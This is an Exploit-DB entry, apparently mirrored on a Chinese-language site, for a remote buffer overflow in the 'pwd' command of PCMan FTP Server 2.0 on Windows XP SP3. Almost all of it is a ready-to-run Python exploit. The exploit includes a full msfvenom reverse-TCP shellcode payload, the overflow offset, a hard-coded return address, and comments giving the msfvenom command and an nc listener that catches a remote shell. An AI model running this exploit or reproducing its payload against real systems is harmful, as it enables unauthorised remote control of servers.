PCMan FTP Server 2.0 – ‘pwd’ Remote Buffer Overflow

  • 作者: Waqas Ahmed Faroouqi
    日期: 2024-02-02
  • 来源:https://www.exploit-db.com/exploits/51767/
  • # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
    # Date: 09/25/2023
    # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
    # Vendor Homepage: http://pcman.openfoundry.org/
    # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
    # Version: 2.0
    # Tested on: Windows XP SP3
    
    #!/usr/bin/python
    
    import socket
    import struct
    
    # Working notes from the crash analysis (every value below is specific to the tested build):
    #   crash buffer : 'A' * 2500 (initial fuzzing buffer that crashed the service)
    #   offset       : 2007 bytes of filler before the saved return address is overwritten
    #   bad chars    : \x00 \x0a \x0d (must not appear anywhere in the buffer)
    #   return addr  : 0x7e429353 in USER32.dll on Windows XP SP3; the exploit hard-codes it, so
    #                  it must be re-found for any other OS build or patch level
    #   payload      : msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
    #   listener     : nc -nvlp 4444 (start it on LHOST before sending the buffer)
    
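    # Stage-2 payload: the msfvenom windows/shell_reverse_tcp output from the
    # notes above (351 bytes, encoded by msfvenom so the bad characters
    # \x00 \x0a \x0d never appear). It is a *bytes* literal on purpose: as a
    # Python 3 str every \xNN escape >= \x80 becomes a code point that
    # socket.send() refuses and that .encode() would UTF-8-expand into two
    # bytes, corrupting the payload. bytes literals behave identically on
    # Python 2. Regenerate with your own LHOST/LPORT before use.
    overflow = (
        b"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
        b"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
        b"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
        b"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
        b"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
        b"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
        b"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
        b"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
        b"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
        b"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
        b"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
        b"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
        b"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
        b"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
        b"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
        b"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
        b"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"
        b"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"
        b"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"
        b"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"
        b"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"
        b"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"
        b"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"
        b"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
        b"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
        b"\xd7"
    )

    # Number of filler bytes before the saved return address is overwritten,
    # and the address written over it (0x7e429353, USER32.dll). The address is
    # hard-coded, so it is only valid for the tested Windows XP SP3 build;
    # re-find it for anything else.
    OFFSET = 2007
    RET_ADDR = 0x7e429353
    NOP_SLED_LEN = 32

    # The complete buffer sent as the argument of the 'pwd' command:
    #   [OFFSET x 'A'] [RET_ADDR, 4 bytes little-endian] [NOP (0x90) sled] [payload]
    # struct.pack("<I", ...) yields the same b"\x53\x93\x42\x7e" the original
    # spelled by hand, but keeps the byte order tied to the documented address.
    # The name is kept because the sender below references it; note it is the
    # whole buffer, not only the shellcode.
    shellcode = (
        b"A" * OFFSET
        + struct.pack("<I", RET_ADDR)
        + b"\x90" * NOP_SLED_LEN
        + overflow
    )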
    
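    # Target: change host/port as required (TARGET_PORT is the FTP control port).
    TARGET_HOST = '192.168.146.135'
    TARGET_PORT = 21
    # Bound every recv() so a hung or silently crashed service cannot stall the
    # script forever; the vulnerable process may die without ever answering.
    SOCKET_TIMEOUT = 10

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(SOCKET_TIMEOUT)

    # socket.error covers connect/send/recv failures and socket.timeout on both
    # Python 2 and 3 (it is an alias of OSError on 3). The original bare
    # except: swallowed *every* exception, including a TypeError from sending a
    # str on Python 3, and reported all of them as "Could not connect".
    try:
        s.connect((TARGET_HOST, TARGET_PORT))
    except socket.error as exc:
        # Only a failed connect is reported as "could not connect".
        print("Could not connect to FTP! (%s)" % exc)
        s.close()
    else:
        try:
            print("\nSending evil buffer...")
            banner = s.recv(1024)           # 220 greeting
            # sendall() keeps writing until the whole buffer is out; send()
            # may return after a partial write and silently truncate the
            # overflow buffer.
            s.sendall(b'USER anonymous\r\n')
            user_reply = s.recv(1024)       # 331 password prompt
            s.sendall(b'PASS anonymous\r\n')
            # The oversized 'pwd' argument is what triggers the overflow;
            # the command is kept lower-case exactly as in the original PoC.
            s.sendall(b'pwd ' + shellcode + b'\r\n')
        except socket.error as exc:
            print("Error while talking to the FTP server: %s" % exc)
        else:
            # Only means the buffer was delivered; the reverse shell (if any)
            # shows up on the nc -nvlp 4444 listener, not here.
            print("\nExploit completed successfully!.")
        finally:
            s.close()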